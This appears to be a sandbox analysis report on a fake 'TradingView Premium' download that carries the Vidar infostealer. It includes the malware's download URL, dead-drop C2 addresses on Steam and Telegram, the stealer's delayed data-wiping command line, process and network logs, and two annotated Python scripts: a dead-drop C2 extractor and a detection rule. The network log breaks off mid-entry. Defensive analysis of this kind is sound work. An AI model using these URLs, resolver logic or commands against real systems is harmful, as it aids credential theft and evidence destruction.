Resubmissions

  • 05-10-2024 20:28   241005-y9al4awgnc   10
  • 05-10-2024 20:22   241005-y5s8ms1gkm   10

Analysis

  • max time kernel
    92s
  • max time network
    244s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    05-10-2024 20:22

General

  • Target

    https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip

Malware Config

Extracted
  • Family
    vidar
  • Version
    11
  • Botnet
    dd3c663b33910bd77937a09a739dc3d6
  • C2
    https://steamcommunity.com/profiles/76561199780418869
    https://t.me/ae5ed

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
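Neither C2 entry in the extracted config is the real command-and-control server: a Steam profile and a Telegram channel are dead-drop resolvers, public pages the operator can edit at any time to point the stealer at the current backend (the sample fetches them with the macOS Firefox user agent above, even though it runs on Windows). The script below, an added example that is not part of the sandbox report, shows how an analyst would pull the parked address out of those pages. It assumes that the Steam persona-name span and the Telegram preview-page description carry the operator-controlled text, which is an assumption about the page markup rather than something the report states; the HTML snippets and TEST-NET addresses are constructed so the script runs offline.

```python
import re
from html import unescape
from urllib.parse import urlparse

# Dead-drop resolver URLs taken from the extracted config above.
DEAD_DROPS = [
    "https://steamcommunity.com/profiles/76561199780418869",
    "https://t.me/ae5ed",
]

# Where each service exposes operator-controlled free text. The Steam
# persona-name span and the Telegram description class are assumptions
# about the page markup, not something the report states.
FIELD_PATTERNS = {
    "steam-profile": re.compile(r'class="actual_persona_name">(.*?)</span>', re.S),
    "telegram-channel": re.compile(r'class="tgme_page_description">(.*?)</div>', re.S),
}

# Constructed sample pages (TEST-NET addresses) standing in for live fetches.
SAMPLE_PAGES = {
    DEAD_DROPS[0]: ('<div class="profile_header_centered_persona">'
                    '<span class="actual_persona_name">https://203.0.113.45:443</span>'
                    '</div>'),
    DEAD_DROPS[1]: ('<div class="tgme_page_title"><span dir="auto">ae5ed</span></div>'
                    '<div class="tgme_page_description">http://198.51.100.27/</div>'),
}


def classify_dead_drop(url: str) -> str:
    """Map a dead-drop URL to the public service that hosts it."""
    host = (urlparse(url).hostname or "").lower()
    if host == "steamcommunity.com" or host.endswith(".steamcommunity.com"):
        return "steam-profile"
    if host in ("t.me", "telegram.me"):
        return "telegram-channel"
    return "unknown"


def looks_like_c2(candidate: str) -> bool:
    """Accept only an absolute http(s) URL with a host part; reject chatter."""
    parsed = urlparse(candidate.strip())
    return parsed.scheme in ("http", "https") and bool(parsed.hostname)


def extract_c2(url: str, page_html: str):
    """Return the C2 URL parked in the dead-drop page, or None if absent."""
    pattern = FIELD_PATTERNS.get(classify_dead_drop(url))
    if pattern is None:
        return None
    match = pattern.search(page_html)
    if not match:
        return None
    # Strip any nested tags and entities before validating the text.
    value = unescape(re.sub(r"<[^>]+>", "", match.group(1))).strip()
    return value if looks_like_c2(value) else None


def resolve_all(pages: dict) -> dict:
    """Run extraction over every dead-drop; pages maps URL -> fetched HTML."""
    return {url: extract_c2(url, pages.get(url, "")) for url in DEAD_DROPS}


if __name__ == "__main__":
    for drop, c2 in resolve_all(SAMPLE_PAGES).items():
        print(f"{classify_dead_drop(drop):17} {drop} -> {c2}")
```

Because the operator can rotate the profile name without touching the binary, block and alert on the dead-drop URLs themselves, and re-run the extraction periodically to catch the backend moving.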

Signatures

  • Detect Vidar Stealer 8 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 59 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3340
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb4051cc40,0x7ffb4051cc4c,0x7ffb4051cc58
      2⤵
      PID:3348
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1800 /prefetch:2
      2⤵
      PID:2632
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2104 /prefetch:3
      2⤵
      PID:5028
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2168,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2380 /prefetch:8
      2⤵
      PID:1412
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3064,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3088 /prefetch:1
      2⤵
      PID:3480
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3056,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3112 /prefetch:1
      2⤵
      PID:4220
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4760,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4772 /prefetch:8
      2⤵
      PID:2956
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4496,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5056 /prefetch:8
      2⤵
      • NTFS ADS
      PID:1288
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=212,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5016 /prefetch:8
      2⤵
      PID:2856
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4796,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5024 /prefetch:8
      2⤵
      PID:4748
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5168 /prefetch:3
      2⤵
      PID:1292
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5012,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5040 /prefetch:8
      2⤵
      PID:1652
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5152,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4936 /prefetch:3
      2⤵
      PID:3420
  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
    1⤵
    PID:988
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
    1⤵
    PID:3960
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:4184
  • C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe
    "C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    PID:4572
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIDBKKKKKFBG" & exit
      2⤵
      PID:1008
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 10
        3⤵
        • Delays execution with timeout.exe
        PID:780
  • C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe
    "C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2752
  • C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe
    "C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"
    1⤵
    PID:1668
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /0
    1⤵
    PID:788
  • C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe
    "C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"
    1⤵
    PID:2544
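The most useful single event in the tree above is the child of PID 4572: the stealer spawns cmd.exe with `/c timeout /t 10 & rd /s /q "C:\ProgramData\GIDBKKKKKFBG" & exit`, a delayed wipe of the working directory it wrote its harvested data into, timed so the parent has already exited. The detection below is an added example, not part of the sandbox report, and runs that logic over constructed process-creation events in Sysmon Event ID 1 shape (Image, CommandLine, ProcessId, ParentProcessId). Three of the events mirror PIDs 4572, 1008 and 780 from the tree; the two benign ones are constructed to show what the rule must not flag. Treating the wiped directory as a run of letters under C:\ProgramData generalises the single name seen here and is an assumption.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 field names).
# The first three mirror the sandbox process tree; the parent of 4572 is
# not shown in the report, so it is left as 0 here.
EVENTS = [
    {"ProcessId": 4572, "ParentProcessId": 0,
     "Image": r"C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe",
     "CommandLine": r'"C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"'},
    {"ProcessId": 1008, "ParentProcessId": 4572,
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIDBKKKKKFBG" & exit'},
    {"ProcessId": 780, "ParentProcessId": 1008,
     "Image": r"C:\Windows\SysWOW64\timeout.exe",
     "CommandLine": "timeout /t 10"},
    # Benign (constructed): an installer removing its temp dir with no delay.
    {"ProcessId": 5100, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\setup_1a2b"'},
    # Benign (constructed): a delay plus cleanup, but not under ProgramData.
    {"ProcessId": 5101, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c timeout /t 5 & rd /s /q "C:\Users\Admin\AppData\Local\Temp\build"'},
]

# timeout [/t] N ... rd|rmdir /s /q "C:\ProgramData\<letters>"
# The 8+ letter directory name generalises GIDBKKKKKFBG and is an assumption.
SELF_CLEAN = re.compile(
    r'timeout(?:\.exe)?\s+(?:/t\s+)?(\d+).*?\b(?:rd|rmdir)\s+/s\s+/q\s+"?'
    r'(C:\\ProgramData\\[A-Za-z]{8,})"?',
    re.IGNORECASE,
)

# Parent living under a user profile (Downloads, Temp, ...) raises confidence.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\", re.IGNORECASE)


def find_process(events, pid):
    """Look up the creation event for a PID, or None if it was not logged."""
    return next((e for e in events if e["ProcessId"] == pid), None)


def detect_delayed_self_cleanup(events):
    """Flag cmd.exe instances that sleep and then wipe a ProgramData directory."""
    findings = []
    for ev in events:
        if not ev["Image"].lower().endswith("\\cmd.exe"):
            continue
        match = SELF_CLEAN.search(ev["CommandLine"])
        if not match:
            continue
        parent = find_process(events, ev["ParentProcessId"])
        parent_image = parent["Image"] if parent else "<unknown>"
        # Confirm the delay actually ran: a timeout.exe child of this cmd.exe.
        delay_seen = any(
            e["ParentProcessId"] == ev["ProcessId"]
            and e["Image"].lower().endswith("\\timeout.exe")
            for e in events
        )
        findings.append({
            "cmd_pid": ev["ProcessId"],
            "delay_seconds": int(match.group(1)),
            "wiped_dir": match.group(2),
            "parent_image": parent_image,
            "parent_in_user_writable": bool(USER_WRITABLE.search(parent_image)),
            "delay_observed": delay_seen,
        })
    return findings


if __name__ == "__main__":
    for hit in detect_delayed_self_cleanup(EVENTS):
        print(hit)
```

The wiped directory is also where the stealer staged what it collected; if this fires, the same path is the first thing to pull from a forensic image before the `rd` completes or, failing that, from volume shadow copies.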

                                        Network

                                        • flag-us
                                          DNS
                                          coincapy.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          coincapy.com
                                          IN A
                                          Response
                                          coincapy.com
                                          IN A
                                          172.67.154.80
                                          coincapy.com
                                          IN A
                                          104.21.64.186
                                        • flag-us
                                          DNS
                                          10.169.217.172.in-addr.arpa
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          10.169.217.172.in-addr.arpa
                                          IN PTR
                                          Response
                                          10.169.217.172.in-addr.arpa
                                          IN PTR
                                          lhr25s26-in-f101e100net
                                        • flag-us
                                          DNS
                                          67.169.217.172.in-addr.arpa
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          67.169.217.172.in-addr.arpa
                                          IN PTR
                                          Response
                                          67.169.217.172.in-addr.arpa
                                          IN PTR
                                          lhr48s09-in-f31e100net
                                        • flag-us
                                          DNS
                                          crl.usertrust.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          crl.usertrust.com
                                          IN A
                                          Response
                                          crl.usertrust.com
                                          IN CNAME
                                          crl.comodoca.com.cdn.cloudflare.net
                                          crl.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          104.18.38.233
                                          crl.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          172.64.149.23
                                        • flag-us
                                          DNS
                                          ocsp.comodoca.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          ocsp.comodoca.com
                                          IN A
                                          Response
                                          ocsp.comodoca.com
                                          IN CNAME
                                          ocsp.comodoca.com.cdn.cloudflare.net
                                          ocsp.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          104.18.38.233
                                          ocsp.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          172.64.149.23
                                        • flag-us
                                          DNS
                                          ocsp.digicert.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          ocsp.digicert.com
                                          IN A
                                          Response
                                          ocsp.digicert.com
                                          IN CNAME
                                          ocsp.edge.digicert.com
                                          ocsp.edge.digicert.com
                                          IN CNAME
                                          fp2e7a.wpc.2be4.phicdn.net
                                          fp2e7a.wpc.2be4.phicdn.net
                                          IN CNAME
                                          fp2e7a.wpc.phicdn.net
                                          fp2e7a.wpc.phicdn.net
                                          IN A
                                          192.229.221.95
                                        • flag-us
                                          DNS
                                          nexusrules.officeapps.live.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          nexusrules.officeapps.live.com
                                          IN A
                                          Response
                                          nexusrules.officeapps.live.com
                                          IN CNAME
                                          prod.nexusrules.live.com.akadns.net
                                          prod.nexusrules.live.com.akadns.net
                                          IN A
                                          52.111.243.29
                                        • flag-us
                                          DNS
                                          251.206.132.45.in-addr.arpa
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          251.206.132.45.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          172.214.232.199.in-addr.arpa
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          172.214.232.199.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          GET
                                          https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip
                                          chrome.exe
                                          Remote address:
                                          172.67.154.80:443
                                          Request
                                          GET /tradingview_premium/TradingView_Premium_Desktop.zip HTTP/2.0
                                          host: coincapy.com
                                          sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          upgrade-insecure-requests: 1
                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                          accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          sec-fetch-site: none
                                          sec-fetch-mode: navigate
                                          sec-fetch-user: ?1
                                          sec-fetch-dest: document
                                          accept-encoding: gzip, deflate, br, zstd
                                          accept-language: en-US,en;q=0.9
                                          Response
                                          HTTP/2.0 200
                                          date: Sat, 05 Oct 2024 20:22:46 GMT
                                          content-type: application/zip
                                          content-length: 139062018
                                          last-modified: Fri, 04 Oct 2024 07:48:29 GMT
                                          x-turbo-charged-by: LiteSpeed
                                          cache-control: max-age=14400
                                          cf-cache-status: REVALIDATED
                                          accept-ranges: bytes
                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TKwqAwNG9cUWeYD0RhRwucJxW%2B9yua1XaIcXEx9jWT5t5fpn5z2ZeuWxCaR9ZOtzOee2OytMpTwjh%2FMaRwYU7C25ZLhwkFlepd4MwbG%2F5XpewLzBKdOupuMZTaCmqkY%3D"}],"group":"cf-nel","max_age":604800}
                                          nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          vary: Accept-Encoding
                                          server: cloudflare
                                          cf-ray: 8ce020280e41539f-LHR
                                        • flag-us
                                          DNS
                                          80.154.67.172.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          80.154.67.172.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          ctldl.windowsupdate.com
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          ctldl.windowsupdate.com
                                          IN A
                                          Response
                                          ctldl.windowsupdate.com
                                          IN CNAME
                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                          IN CNAME
                                          wu-b-net.trafficmanager.net
                                          wu-b-net.trafficmanager.net
                                          IN CNAME
                                          bg.microsoft.map.fastly.net
                                          bg.microsoft.map.fastly.net
                                          IN A
                                          199.232.210.172
                                          bg.microsoft.map.fastly.net
                                          IN A
                                          199.232.214.172
                                        • flag-us
                                          DNS
                                          172.210.232.199.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          172.210.232.199.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          crl.comodoca.com
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          crl.comodoca.com
                                          IN A
                                          Response
                                          crl.comodoca.com
                                          IN CNAME
                                          crl.comodoca.com.cdn.cloudflare.net
                                          crl.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          104.18.38.233
                                          crl.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          172.64.149.23
                                        • flag-us
                                          DNS
                                          109.234.82.104.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          109.234.82.104.in-addr.arpa
                                          IN PTR
                                          Response
                                          109.234.82.104.in-addr.arpa
                                          IN PTR
                                          a104-82-234-109deploystaticakamaitechnologiescom
                                        • flag-us
                                          DNS
                                          cowod.hopto.org
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          cowod.hopto.org
                                          IN A
                                          Response
                                          cowod.hopto.org
                                          IN A
                                          45.132.206.251
                                        • flag-us
                                          DNS
                                          ctldl.windowsupdate.com
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          ctldl.windowsupdate.com
                                          IN A
                                          Response
                                          ctldl.windowsupdate.com
                                          IN CNAME
                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                          IN CNAME
                                          wu-b-net.trafficmanager.net
                                          wu-b-net.trafficmanager.net
                                          IN CNAME
                                          bg.microsoft.map.fastly.net
                                          bg.microsoft.map.fastly.net
                                          IN A
                                          199.232.214.172
                                          bg.microsoft.map.fastly.net
                                          IN A
                                          199.232.210.172
                                        • flag-us
                                          DNS
                                          steamcommunity.com
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          steamcommunity.com
                                          IN A
                                          Response
                                          steamcommunity.com
                                          IN A
                                          104.82.234.109
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:48 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6286
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b1afe59541-LHR
                                        • [US]
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Cache-Control: no-cache
                                          Connection: Keep-Alive
                                          Pragma: no-cache
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:48 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6286
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b218509541-LHR
                                        • [US]
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2%2BiPob4twryIF%2BFfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa%2FLgCEBBwnU%2F1VAjXMGAB2OqRdbs%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2%2BiPob4twryIF%2BFfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa%2FLgCEBBwnU%2F1VAjXMGAB2OqRdbs%3D HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:49 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 2030
                                          Connection: keep-alive
                                          Last-Modified: Thu, 03 Oct 2024 16:58:04 GMT
                                          Expires: Thu, 10 Oct 2024 16:58:03 GMT
                                          Etag: "57e3b1b8b0b2cf7adf3dc05c2563cc8c2a2de222"
                                          Cache-Control: max-age=602798,s-maxage=1800,public,no-transform,must-revalidate
                                          X-CCACDN-Proxy-ID: mcdpinlb1
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 1180
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b37a1e9541-LHR
                                        • [US]
                                          GET
